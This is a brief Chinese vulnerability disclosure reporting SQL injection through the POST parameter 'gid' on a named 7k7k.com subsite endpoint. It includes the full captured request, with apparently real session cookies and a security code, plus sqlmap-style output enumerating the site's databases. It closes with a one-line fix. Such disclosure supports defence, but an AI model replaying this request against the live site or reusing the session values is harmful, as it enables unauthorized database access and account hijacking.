奇客星空某分站SQL注射漏洞
相关页面:
http://web.7k7k.com/source/cms/newServer.php
post参数:gid
post包:
POST /source/cms/newServer.php HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://web.7k7k.com:80/
Cookie: PHPSESSID=qt88ga5hqc6pttdclihba904m6; timekey=dbedc8b5bd73801fa7e49e8312f358d7; username=cdqmvdsw; identity=cdqmvdsw; nickname=196505246; userid=483938663; kk=196505246; logintime=1394680619; k7_lastlogin=1394681640; loginfrom=0011; avatar=http%3A%2F%2Fsface.7k7kimg.cn%2Fuicons%2Fphoto_default_s.png; securitycode=3c91523a8ca0e001c4606e9353ea5cdc; k7_lastlogin=2014-03-13+11%3A16%3A59; web_uniques=482237872; k7_gamekey=%5B%2221_1%22%2C%2221_12%22%5D; k7_gamelist=%5B%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf%5Cu4e00%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%221%22%7D%2C%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf12%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%2212%22%7D%5D; yourplayedwebgames=dcj%257C%25E9%25BE%2599%25E7%25BA%25B9%25E6%2588%2598%25E5%259F%259F%252Chp2%257C%25E7%2594%25BB%25E7%259A%25AE2%252Csq%257C%25E7%25A5%259E%25E6%259B%25B2%252Cqjll%257C%25E5%25A5%2587%25E8%25BF%25B9%25E6%259D%25A5%25E4%25BA%2586%252Csctx%257C%25E7%25A5%259E%25E5%2588%259B%25E5%25A4%25A9%25E4%25B8%258B%252Ctdyx%257C%25E5%25A4%25A9%25E5%259C%25B0%25E8%258B%25B1%25E9%259B%2584
Host: web.7k7k.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
gid=7
成功注入:
跑出的数据库:
available databases [2]:
[*] information_schema
[*] web7k
web7k的表:[221 tables]
表就不列了,保护厂商,点到为止,呼呼
修复方案:
过滤参数
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;